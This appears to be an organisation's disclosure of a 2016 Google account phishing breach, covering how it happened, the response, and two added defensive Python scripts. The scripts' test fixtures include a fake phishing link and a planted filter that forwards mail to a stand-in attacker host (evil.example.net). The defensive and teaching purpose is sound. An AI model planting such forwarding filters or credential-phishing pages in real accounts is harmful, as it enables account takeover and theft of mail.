This morning (19 February 2016 at 07:24), a Pragmatic email account was used to send a malicious email to the contacts in their address book entitled “Pragmatic”.
Note the link (labelled ‘1’) “Download / view” and what appears to be an attached PDF “doc01108220150902100035.pdf” (labelled ‘2’). The ‘PDF’ (2) is actually just an embedded image that links to the same URL as the text link (1).
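The tell-tale feature of this email, a visible "Download / view" link and an image dressed up as a PDF attachment that both point at the same external URL, can be checked mechanically. The script below is an added example, not code from Pragmatic or from the original post: it parses a constructed HTML message (the domain evil.example.net is a placeholder, not the real phishing host) and reports links whose "attachment" is really an image, and distinct link presentations that share one external destination.

```python
"""Flag the phishing layout described above: a text link and an image posing
as a PDF attachment that both lead to the same external URL."""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message mimicking the layout described in the post;
# evil.example.net is a placeholder, not the real phishing host.
RAW_MESSAGE = b"""\
From: Compromised Account <sender@example.com>
To: recipient@example.org
Subject: Pragmatic
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please see the document below.</p>
<p><a href="http://evil.example.net/drive/view">Download / view</a></p>
<p><a href="http://evil.example.net/drive/view"><img src="cid:pdficon"
   alt="doc01108220150902100035.pdf"></a></p>
</body></html>
"""

# File extensions that an attacker would choose for a fake attachment icon.
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx")


class LinkCollector(HTMLParser):
    """Collect every <a href> with its visible text and any images it wraps."""

    def __init__(self):
        super().__init__()
        self.links = []      # each entry: {"href", "text", "images"}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and attrs.get("href"):
            self._current = {"href": attrs["href"], "text": "", "images": []}
        elif tag == "img" and self._current is not None:
            # Record the alt text (or src) of an image shown inside a link.
            self._current["images"].append(attrs.get("alt") or attrs.get("src", ""))

    def handle_data(self, data):
        if self._current is not None:
            self._current["text"] += data

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            self._current["text"] = self._current["text"].strip()
            self.links.append(self._current)
            self._current = None


def extract_links(raw_message):
    """Parse the HTML body of a raw RFC 822 message and return its links."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return []
    parser = LinkCollector()
    parser.feed(body.get_content())
    return parser.links


def analyse(raw_message, trusted_hosts=()):
    """Return human-readable findings for the two tricks used in the email."""
    findings = []
    links = extract_links(raw_message)
    for link in links:
        host = urlparse(link["href"]).hostname or ""
        external = host not in trusted_hosts
        for label in link["images"]:
            # An image named like a document, wrapped in an off-site link,
            # is a fake attachment rather than a real one.
            if external and label.lower().endswith(DOC_EXTENSIONS):
                findings.append(f"fake attachment: image '{label}' links to {link['href']}")
    # Several differently presented links that all resolve to one external
    # URL are the second hallmark of this message.
    by_href = {}
    for link in links:
        by_href.setdefault(link["href"], []).append(link)
    for href, group in by_href.items():
        host = urlparse(href).hostname or ""
        if len(group) > 1 and host not in trusted_hosts:
            findings.append(f"{len(group)} differently presented links share external URL {href}")
    return findings


if __name__ == "__main__":
    for finding in analyse(RAW_MESSAGE):
        print(finding)
```

Passing your own mail domains in `trusted_hosts` suppresses findings for links back to systems you control; everything else pointing at a document-like image is worth a second look before anyone clicks.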
How did the breach happen?
On 18 February 2016 at 06:02, an employee received an email (almost exactly the same as the one above).
At some point before 09:18, the employee clicked one of the links in that email and was taken to a page that misrepresented itself as a Google login screen. She entered her Google login details but was presented with an error message, so she closed the browser window and contacted the sender to tell them she couldn’t access the file.
When she entered her Google login details into the malicious web page, her credentials were compromised. The attackers then used them to log into her account on 19 February 2016 at 07:23 and send the malicious email to her address book contacts, almost certainly using an automated tool. We traced the access to a Virgin Media IP address in the UK, but that is probably just an infected computer or other proxy.
What steps did we take?
Within 21 minutes we had:
- Reset the employee’s Google Apps password
- Contacted all recipients of the original email asking them to disregard and delete the malicious email
- Checked the employee’s Google Apps security settings to examine compliance with our security policy
- We reviewed our Google Apps security policies and enforced the use of Two Factor Authentication (2FA) across all new and existing user accounts (including the employee’s). Our internal policies had previously specified but not enforced 2FA, and in this case it looks like human error that the employee’s account was set up without 2FA turned on. If 2FA had been turned on, the credential compromise would still have been a security breach, but it wouldn’t have allowed the attackers to log in unless they also had access to her 2FA codes or devices.
- We reset the employee’s passwords across all key services and ensured all passwords are unique to each service
- We signed the employee’s Google account out of all other web sessions just in case
- We’ve audited the employee’s account activity log
- We checked over the employee’s account to ensure that she could safely send and receive email (thanks to a blog post for the tip about removing a cleverly designed mail filter)
- We’ll use this breach as an opportunity to help our team learn how to spot phishing emails (there’s some good advice here)
- We’ll be protected by Google’s 2FA
- We’ll identify other services where 2FA is available and enforce its use
- We’ll review our security policy to ensure there’s nothing more we can do
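The "cleverly designed filter" mentioned above is a common follow-on to a mailbox takeover: a rule that trashes, archives, marks as read or forwards the replies and warnings that would otherwise tip the owner off. The script below is an added example, not Pragmatic's own tooling: it audits a Gmail filter export (Settings → Filters → Export produces an Atom feed with `apps:property` elements; the sample here is constructed, and evil.example.net is a placeholder) and lists the filters that hide or forward mail, or that match security-related wording.

```python
"""Audit a Gmail filter export for rules that hide or divert mail, the kind of
filter an attacker plants in a compromised mailbox."""
import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Filter criteria fields whose wording we inspect.
CRITERIA_KEYS = ("from", "to", "subject", "hasTheWord", "doesNotHaveTheWord")
# Words a victim's contacts would use when warning them about the breach.
SUSPICIOUS_TERMS = ("phish", "hack", "password", "security", "suspicious",
                    "access", "account", "virus")

# Constructed sample export (not from the incident): one benign newsletter
# rule, one rule that deletes warnings, one that forwards mail off-site.
SAMPLE_EXPORT = """<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom' xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <category term='filter'></category>
    <title>Mail Filter</title>
    <apps:property name='from' value='newsletter@example.com'/>
    <apps:property name='label' value='Newsletters'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry>
    <category term='filter'></category>
    <title>Mail Filter</title>
    <apps:property name='hasTheWord' value='phish OR hacked OR password OR "cannot access"'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
    <apps:property name='shouldTrash' value='true'/>
  </entry>
  <entry>
    <category term='filter'></category>
    <title>Mail Filter</title>
    <apps:property name='to' value='me@example.com'/>
    <apps:property name='forwardTo' value='dropbox@evil.example.net'/>
  </entry>
</feed>
"""


def parse_filters(xml_text):
    """Return one {property name: value} dict per filter entry in the export."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    filters = []
    for entry in root.findall(f"{ATOM}entry"):
        props = {p.get("name"): p.get("value") for p in entry.findall(f"{APPS}property")}
        filters.append(props)
    return filters


def assess(props, trusted_domains=()):
    """Return the reasons a single filter looks like it was planted by an attacker."""
    reasons = []
    forward = props.get("forwardTo", "")
    if forward and forward.rsplit("@", 1)[-1].lower() not in trusted_domains:
        reasons.append(f"forwards matching mail to external address {forward}")
    if props.get("shouldTrash") == "true":
        reasons.append("deletes matching mail")
    elif props.get("shouldMarkAsRead") == "true" and props.get("shouldArchive") == "true":
        reasons.append("marks matching mail read and removes it from the inbox")
    criteria = " ".join(props.get(key, "") for key in CRITERIA_KEYS).lower()
    hits = [term for term in SUSPICIOUS_TERMS if term in criteria]
    if hits:
        reasons.append("matches security-related wording: " + ", ".join(hits))
    return reasons


def audit(xml_text, trusted_domains=()):
    """Return (filter number, properties, reasons) for every suspicious filter."""
    flagged = []
    for number, props in enumerate(parse_filters(xml_text), start=1):
        reasons = assess(props, trusted_domains)
        if reasons:
            flagged.append((number, props, reasons))
    return flagged


if __name__ == "__main__":
    for number, props, reasons in audit(SAMPLE_EXPORT):
        print(f"filter {number}: {'; '.join(reasons)}")
        print(f"  criteria: { {k: v for k, v in props.items() if k in CRITERIA_KEYS} }")
```

A filter that only archives and labels a newsletter produces no finding, so the output stays short enough to read after an incident; anything that deletes, hides or forwards mail is printed with the criteria it matches so the reviewer can decide whether the account owner really created it.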
What information was compromised?
At this point we don’t believe that the compromised credentials were used for anything other than to send the phishing email above. The attackers had access to her account for less than 30 minutes. Her Google account doesn’t give her access to any key business systems or customer data beyond the contents of her email inbox and address book.
What should you do?
Unless you followed the malicious link and entered valid Google login details into the form, we don’t think there’s any risk to your computer or accounts. You should always maintain effective computer security systems like antivirus and password management tools.
If you did enter your account details, please follow Google’s guide here.
We’re extremely sorry for any inconvenience caused. We hope this report and analysis reassures you that we care deeply about security and have taken steps to enhance our security posture going forward.